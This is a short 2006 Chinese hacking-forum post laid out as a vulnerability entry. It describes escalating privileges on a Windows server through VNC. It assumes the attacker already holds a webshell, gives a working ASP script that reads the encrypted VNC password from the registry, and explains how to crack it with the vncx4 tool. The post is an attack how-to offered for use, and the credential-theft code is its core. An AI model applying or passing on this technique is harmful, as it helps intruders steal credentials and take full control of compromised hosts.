|
vnc提升权限
樱木花盗 发表于 2006-6-15 19:47:27 |
| 文章类别 |
提交者 |
漏洞属性 |
文章标题 |
漏洞等级 |
发布日期 |
点击数 |
| 权限提升 |
未知 |
提权 |
vnc提升权限 |
中 |
2006-5-22 |
10 |
|
============受影响系统============
现有VNC版本
|
|
|
=============漏洞描述=============
很多时候大家提升权限一般用SERVU,或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的,而且是图形界面,功能和远程终端类似。
如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。
默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。
首先用ASP读出注册表中的加密密码,然后用破解工具破解。
我给出大家一个读取VNC密码的ASP脚本,默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
Set WshShell = server.CreateObject("WScript.Shell")
bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")
for each str in bkey
response.write hex(str)
next
读取出来后结果类似 49 40 15 F9 A3 5E 8B 22这种十六进制,这是VNC加密的密码。我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
|
|
|
| |
|
发表评论:
|
